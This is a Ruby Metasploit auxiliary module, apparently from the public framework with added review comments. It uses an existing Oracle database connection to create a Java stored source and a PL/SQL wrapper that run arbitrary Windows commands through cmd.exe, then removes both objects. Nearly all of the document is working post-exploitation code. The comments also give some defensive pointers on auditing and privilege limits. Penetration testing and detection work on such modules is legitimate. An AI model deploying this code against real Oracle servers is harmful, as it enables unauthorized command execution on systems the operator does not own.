GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/auxiliary/admin/oracle/post_exploitation/win32exec.rb
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
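# Auxiliary module that, over an existing Oracle connection, creates a Java
# stored source plus a PL/SQL wrapper procedure, calls the wrapper once with
# `cmd.exe /c <CMD>`, and then drops both objects again.
#
# NOTE(review): connection handling, `check_dependencies` and `prepare_exec`
# come from Msf::Exploit::ORACLE, which is not shown here; their exact error
# behaviour should be confirmed against the mixin.
#
# NOTE(review): the statements issued are plain DDL (`create or replace ...
# java source`, `create or replace procedure`, `drop java source`,
# `drop procedure`). The object names are random upper-case strings of 1-10
# letters, so DDL auditing on the database should key on the statement type
# and the `as language java` wrapper rather than on a fixed name. Presumably
# the connected account needs the right to create Java sources/procedures and
# JVM permission to spawn processes; restricting those is the mitigation.
class MetasploitModule < Msf::Auxiliary
  include Msf::Exploit::ORACLE

  # Registers module metadata and the single CMD option.
  #
  # @param info [Hash] caller-supplied metadata, merged through update_info
  def initialize(info = {})
    super(update_info(info,
      'Name' => 'Oracle Java execCommand (Win32)',
      'Description' => %q{
This module will create a java class which enables the execution of OS commands.
},
      'Author' => [ 'MC' ],
      'License' => MSF_LICENSE,
      'References' =>
        [
          [ 'URL', 'https://www.metasploit.com/users/mc' ],
        ],
      'DisclosureDate' => '2007-12-07'))

    register_options(
      [
        OptString.new('CMD', [ false, 'The OS command to execute.', 'echo metasploit > %SYSTEMDRIVE%\\\\unbreakable.txt']),
      ])
  end

  # Creates the Java source and wrapper procedure, invokes the wrapper once,
  # and removes both objects afterwards.
  #
  # Returns early (nil) when check_dependencies is falsy or when creating the
  # Java source raises. Once the Java source exists, both drop statements are
  # attempted from an `ensure` block, so an exception while creating or
  # calling the procedure no longer leaves a command-executing stored object
  # behind in the database.
  def run
    return unless check_dependencies

    # Two independent random identifiers, 1-10 upper-case letters each.
    source = Rex::Text.rand_text_alpha_upper(rand(10) + 1)
    name = Rex::Text.rand_text_alpha_upper(rand(10) + 1)

    java = "
create or replace and resolve java source named \"#{source}\" as
import java.lang.*;
import java.io.*;
public class #{source}
{
public static void execCommand (String command) throws IOException
{
Runtime.getRuntime().exec(command);
}
};
"

    procedure = "
create or replace procedure #{name} (p_command in varchar2)
as language java
name '#{source}.execCommand (java.lang.String)';
"

    # CMD is interpolated verbatim into a single-quoted PL/SQL literal; a
    # single quote inside CMD ends that literal and the statement will not
    # parse as intended.
    call_sql = "begin #{name}('cmd.exe /c #{datastore['CMD']}'); end;"

    drop_source_sql = "drop java source #{source}"

    drop_procedure_sql = "drop procedure #{name}"

    begin
      print_status("Creating java source '#{source}'...")
      prepare_exec(java)
    rescue => e
      # Previously swallowed silently; report why the module stopped.
      print_error("Creating java source '#{source}' failed: #{e}")
      return
    end

    begin
      print_status("Creating procedure '#{name}'...")
      prepare_exec(procedure)

      print_status("Sending command: '#{datastore['CMD']}'")
      prepare_exec(call_sql)
    ensure
      # Same order as before: Java source first, then the procedure. Each
      # drop is attempted independently so one failure does not skip the other.
      [
        ["java source '#{source}'", drop_source_sql],
        ["procedure '#{name}'", drop_procedure_sql]
      ].each do |label, sql|
        begin
          print_status("Removing #{label}...")
          prepare_exec(sql)
        rescue => e
          print_error("Removing #{label} failed: #{e}")
        end
      end
    end
  end
end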